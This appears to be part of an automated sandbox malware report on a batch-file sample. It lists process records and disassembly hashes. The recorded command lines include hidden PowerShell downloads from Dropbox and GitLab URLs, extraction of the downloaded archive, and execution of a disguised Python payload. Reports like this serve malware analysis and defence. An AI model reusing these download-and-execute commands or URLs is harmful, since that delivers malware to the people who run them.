                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                        Imagebase:0x7ff69e8d0000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"
                                                                                                                                                                                        Imagebase:0x7ff6dd190000
                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"
                                                                                                                                                                                        Imagebase:0x7ff6dd190000
                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"
                                                                                                                                                                                        Imagebase:0x7ff6dd190000
                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"
                                                                                                                                                                                        Imagebase:0x7ff6dd190000
                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:fINd
                                                                                                                                                                                        Imagebase:0x7ff645d80000
                                                                                                                                                                                        File size:17'920 bytes
                                                                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:find
                                                                                                                                                                                        Imagebase:0x7ff645d80000
                                                                                                                                                                                        File size:17'920 bytes
                                                                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                        Imagebase:0x7ff69e8d0000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                        Start time:03:56:07
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                        Start time:03:56:08
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:03:56:19
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:03:56:34
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00007FFD349809CD Relevance: 1.8, Strings: 1, Instructions: 541COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213377786.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: .@_H
                                                                                                                                                                                          • API String ID: 0-1410794216
                                                                                                                                                                                          • Opcode ID: a5608a2d67ceb9cf77ea829ed9f71df815e40fe83ac46698f88f5cbc475066db
                                                                                                                                                                                          • Instruction ID: c5c8570c6857b912a8e04d77b0d8b1dc59e95b36853b219985de5aacff8e3134
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5608a2d67ceb9cf77ea829ed9f71df815e40fe83ac46698f88f5cbc475066db
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F14922A0EBC81FE796976C58A55A53FE0EF57310F0A01FFD589C7193E918AC05C362
                                                                                                                                                                                          Function 00007FFD34980C89 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213377786.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e13132d35393bb484df9aa1cc0afb18bee4ea5ab057f5dc8913f3128cbc12a9
                                                                                                                                                                                          • Instruction ID: d3d9eab49ba431d2247b1c5bc390b436232803a86f813a9a6daec5041d1f2c04
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e13132d35393bb484df9aa1cc0afb18bee4ea5ab057f5dc8913f3128cbc12a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F418A11A4E7C11FE397977858796A43FE0AF43260F0A40EFE589CB0E7E95D184AD322
                                                                                                                                                                                          Function 00007FFD34983734 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213377786.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 39716f9fb0cedea5281638289ab65f86c8ae7f457b6800846b6ae036175a0241
                                                                                                                                                                                          • Instruction ID: 0f6aed8cad24e1a9d79894980791933597d128f91f97e4765c2643e398f70c5f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 39716f9fb0cedea5281638289ab65f86c8ae7f457b6800846b6ae036175a0241
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD312772B0D6484FEBA5DB5C94A16B8B7D1EF9A320B1800BFC14DC7197DA2EE801D350
                                                                                                                                                                                          Function 00007FFD3498375A Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213377786.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 24e8b78f8c70ba3de70868bb01449793a0641045de301db4a76122c5f9a848ac
                                                                                                                                                                                          • Instruction ID: e92491c9255ae72436feed8be03ea643d68fb7feaa7104570ccfcc87c8a9a20b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e8b78f8c70ba3de70868bb01449793a0641045de301db4a76122c5f9a848ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C110271F0E6854FEBA1DB5C84A51B9B7D1FF8A310B0400BEC64DC7187CA2AE845C360
                                                                                                                                                                                          Function 00007FFD34980B44 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213377786.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3c3de0dae7639cf50ea7bc1613e38e04074eb56e0c73116ede617733e5009692
                                                                                                                                                                                          • Instruction ID: 89c6aac0db2bd7b3a637891c86cd040c9aea71752ed9f8727f889bced833be4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c3de0dae7639cf50ea7bc1613e38e04074eb56e0c73116ede617733e5009692
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5101B532F0EB464FEBA9A65C54A61B872D1FF8625575500BEE14DC31A7DD2EAC059200
                                                                                                                                                                                          Function 00007FFD348B4195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                          • Instruction ID: 5e2e1d49d45fb6b89b0fa391f2236679d183cf699ff5fb0ffebb47dcbf80b9fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6401A73020CB0C4FD744EF4CE051AA5B3E0FB99320F10052DE58AC3665DA36E881CB41

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00007FFD348B35F2 Relevance: .4, Instructions: 450COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: be66c763e241cf63c6b9555885397d23f7dad9fd8c3c290764fa3df351b7a26b
                                                                                                                                                                                          • Instruction ID: a3aede06c68306547c1e55b09c569e251e5480282f89e88e8d07ec65e21fbd89
                                                                                                                                                                                          • Opcode Fuzzy Hash: be66c763e241cf63c6b9555885397d23f7dad9fd8c3c290764fa3df351b7a26b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46E18F31A08A4A8FEB94DF5CC4A5AE977E1FF5A310F14017AD409D7296CEB8E841DBC1
                                                                                                                                                                                          Function 00007FFD348B1005 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5de3202847d6bc79932e5070e8fb3eb04b5b81038cebb15023b1fe1a913aaf65
                                                                                                                                                                                          • Instruction ID: 3af886f863d298ab94653c99a3280bc417b26a7b57f99762d12fb186c2e74ef0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de3202847d6bc79932e5070e8fb3eb04b5b81038cebb15023b1fe1a913aaf65
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C81FF53A0EAE65FEB13A76C58F60E53F60EF1329070901B7C595DF093ED4CA80A9392
                                                                                                                                                                                          Function 00007FFD348B6321 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9b2d0c8cb4062db3361dcf05cdb08b12345fc1f7ca5e39aeeaf8b9487da93811
                                                                                                                                                                                          • Instruction ID: 885974755d02f54e563adafe7f06f027000119b01bd8904670629036d91d7420
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b2d0c8cb4062db3361dcf05cdb08b12345fc1f7ca5e39aeeaf8b9487da93811
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6616046A0D7C25FE7125B7C18B60EA3FA4DF5322570D01B7D6C4DA0A3ED5D280BA2A3
                                                                                                                                                                                          Function 00007FFD348B2735 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5c5217d3402acb28fd32784775b6bead17a5fa6e99302c3a080a5c3ad1d2dc1f
                                                                                                                                                                                          • Instruction ID: 942812fc47ebb6a185c9a943ccb4890abff49c20f2fdde896e6760fd921449fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c5217d3402acb28fd32784775b6bead17a5fa6e99302c3a080a5c3ad1d2dc1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9514462A0D7C65FF316977C98BA0D93FA0DF5332470A01B6C6D4CA4A3EE5C280697E5
                                                                                                                                                                                          Function 00007FFD348B2AFA Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 6fbde75c47ec5996d729efd75709d6d567728b510d8a6cac75b81cd3a50ccbdb
                                                                                                                                                                                          • Instruction ID: 03e70e209a919a1f3f2265c11150fd6d9276a9879f2df2c0d6c45967be644932
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fbde75c47ec5996d729efd75709d6d567728b510d8a6cac75b81cd3a50ccbdb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B51C016B0EB8A4FE752973C98F91E57B90DF5322570902F7C688CB093DD4D680B92D1
                                                                                                                                                                                          Function 00007FFD348B42FA Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 76f96f5aec38c5aa81f9a22fe6a9c1e2856fffed908ac0abe4de2abae2bf7372
                                                                                                                                                                                          • Instruction ID: 866ac8c9817cfed52b634f338070c6069716075133d37eeeb4a3c0e0f2b3cc6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 76f96f5aec38c5aa81f9a22fe6a9c1e2856fffed908ac0abe4de2abae2bf7372
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4419D66A0E7C25FE752667C59B30DA3FE4DF1322470D01F7C5C1CA093EE5DA80A9692

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00007FFD349809CD Relevance: 1.8, Strings: 1, Instructions: 546COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: .@_H
                                                                                                                                                                                          • API String ID: 0-1410794216
                                                                                                                                                                                          • Opcode ID: 968904140047418573a3af7d9219827d3baca2174a9f4328f8e3a0a9e5d4b3af
                                                                                                                                                                                          • Instruction ID: 9cec72f3c75a77a2047319f0d25769d8f6d68ce746c837ce021becbc97118351
                                                                                                                                                                                          • Opcode Fuzzy Hash: 968904140047418573a3af7d9219827d3baca2174a9f4328f8e3a0a9e5d4b3af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F13A22A0EBC81FE796976C58B55A63FE0EF57210F0A01FFE589C71D3D919A805C362
                                                                                                                                                                                          Function 00007FFD34980C89 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f34676d1c20b6844a0d4db5167b1bed4159ac7677ef6d6c2ceb0992e8d4ef652
                                                                                                                                                                                          • Instruction ID: 4419859bba7a61ee2952ad7644098076503ecb5df5dadf075f4ae55df8ec752d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f34676d1c20b6844a0d4db5167b1bed4159ac7677ef6d6c2ceb0992e8d4ef652
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F418811A4E7C11FE397977858B96A93FA1AF43250F1A40EFE5C9CB0E3D909184AD322
                                                                                                                                                                                          Function 00007FFD34983734 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 063f4ae6331da7884f5f90bb0a2293c6cf1624d46b92f039def56e94958e65a6
                                                                                                                                                                                          • Instruction ID: 95a69079818e4b3718d056183f6fc577cbe30d2cc10a61306ecd997722fd1200
                                                                                                                                                                                          • Opcode Fuzzy Hash: 063f4ae6331da7884f5f90bb0a2293c6cf1624d46b92f039def56e94958e65a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8312932B0D6494FEBA5DB5C94A16F9B7D1EF9A310B1801BFC14DC7197DA2AE801D390
                                                                                                                                                                                          Function 00007FFD3498375A Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 24e8b78f8c70ba3de70868bb01449793a0641045de301db4a76122c5f9a848ac
                                                                                                                                                                                          • Instruction ID: e92491c9255ae72436feed8be03ea643d68fb7feaa7104570ccfcc87c8a9a20b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e8b78f8c70ba3de70868bb01449793a0641045de301db4a76122c5f9a848ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C110271F0E6854FEBA1DB5C84A51B9B7D1FF8A310B0400BEC64DC7187CA2AE845C360
